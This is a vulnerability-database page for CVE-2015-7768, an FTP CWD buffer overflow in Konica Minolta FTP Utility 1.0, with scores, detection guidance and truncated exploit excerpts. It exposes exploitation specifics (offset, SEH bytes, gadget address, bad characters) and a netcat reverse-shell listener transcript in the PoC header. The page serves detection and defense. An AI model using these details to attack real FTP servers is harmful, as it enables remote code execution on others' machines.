CVE-2015-7768
Published 2015-10-09
CVE-2015-7768: Buffer overflow in Konica Minolta FTP Utility 1.0 allows remote attackers to execute arbitrary code via a long CWD command.
Priority P2 (65) · high · CVSS 2.0 base score 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: available
EPSS: 63.21% (99.1th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| konicaminolta | ftp_utility | — | — |
Detection & IOCs (extracted from sources)
Bytes: \xeb\x0a\x90\x90 (nSEH jump) + \x9D\x6D\x20\x12 (SEH handler, KMFtpCM.dll PPR)
Detection:
- Detect oversized FTP CWD commands (>1037 bytes) sent to port 21, indicative of SEH overflow exploitation against Konica Minolta FTP Utility 1.00.
- Match the FTP banner string 'FTP Utility FTP server (Version 1.00)' to identify vulnerable Konica Minolta FTP instances.
- Alert on an anonymous FTP login followed immediately by a CWD command with a payload exceeding ~1037 bytes, as the exploit uses anonymous credentials by default.
- Look for the SEH overwrite byte sequence \xeb\x0a\x90\x90 (short jump in nSEH) followed by \x9d\x6d\x20\x12 (PPR gadget in KMFtpCM.dll) within FTP CWD command payloads.
- Monitor for outbound reverse shell connections on port 4444 originating from the FTP Utility process (KMFtpCM.dll / FTP Utility host) post-exploitation.
Caveats:
- The SEH return address (PPR gadget 0x12206d9d) is hardcoded to KMFtpCM.dll and is only valid for the Windows 7 SP1 x86 target; different OS/patch levels will require a different gadget address.
- The exploit offset of 1037 bytes before the SEH record is specific to Konica Minolta FTP Utility version 1.00 on Windows 7 SP1 x86; other versions or platforms may differ.
- Bad characters \x00, \x0a, \x2f, \x5c must be avoided in shellcode; the PoC also excludes \x0d, \x3d in its encoder invocation.
- Payload space is limited to 1500 bytes within the CWD overflow buffer for this exploit configuration.
No detection rules found.
Exploit-DB
Konica Minolta FTP Utility 1.00 - CWD Command Overflow (SEH) (exploitdb, 2016-01-11)
---
# Title: Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow.
# Date : 01/08/2016
# Author: TOMIWA.
# Software link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
# Software: Konica Minolta FTP Utility v1.0
# Tested: Windows 7 SP1 64bits
# Listen for a reverse netcat connection on port 4444
# root@kali:~# nc -nlvp 4444
# listening on [any] 4444 ...
# connect to [192.168.0.11] from (UNKNOWN) [192.168.0.109] 49158
# Microsoft Windows [Version 6.1.7601]
# Copyright (c) 2009 Microsoft Corporation. All rights reserved.
# C:\Program Files (x86)\KONICA MINOLTA\FTP Utility>
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7A
Exploit-DB
Konica Minolta FTP Utility 1.00 - (Authenticated) CWD Command Overflow (SEH) (Metasploit) (exploitdb, 2015-09-21)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow',
'Description' => %q{
This module exploits an SEH overflow in Konica Minolta FTP Server 1.00.
Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which
leads to an SEH overflow. Konica FTP allows anonymous access by default; valid
credentials are typically unnecessary to exploit this vulnerability.
},
'Author' =>
[
'Shankar Damodaran', # stack buffer overflow dos p.o.c
'Muhamad Fadzil Ramli ' # seh overflow, metasploit module
],
'Lic
Metasploit
Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow (exploit/windows/ftp/kmftp_utility_cwd)
This module exploits an SEH overflow in Konica Minolta FTP Server 1.00. Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which leads to an SEH overflow. Konica FTP allows anonymous access by default; valid credentials are typically unnecessary to exploit this vulnerability.
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/133621/Konica-Minolta-FTP-Utility-1.00-Post-Auth-CWD-Command-SEH-Overflow.html
- http://packetstormsecurity.com/files/137252/Konica-Minolta-FTP-Utility-1.0-SEH-Buffer-Overflow.html
- http://www.rapid7.com/db/modules/exploit/windows/ftp/kmftp_utility_cwd
- https://www.exploit-db.com/exploits/38254/
- https://www.exploit-db.com/exploits/39215/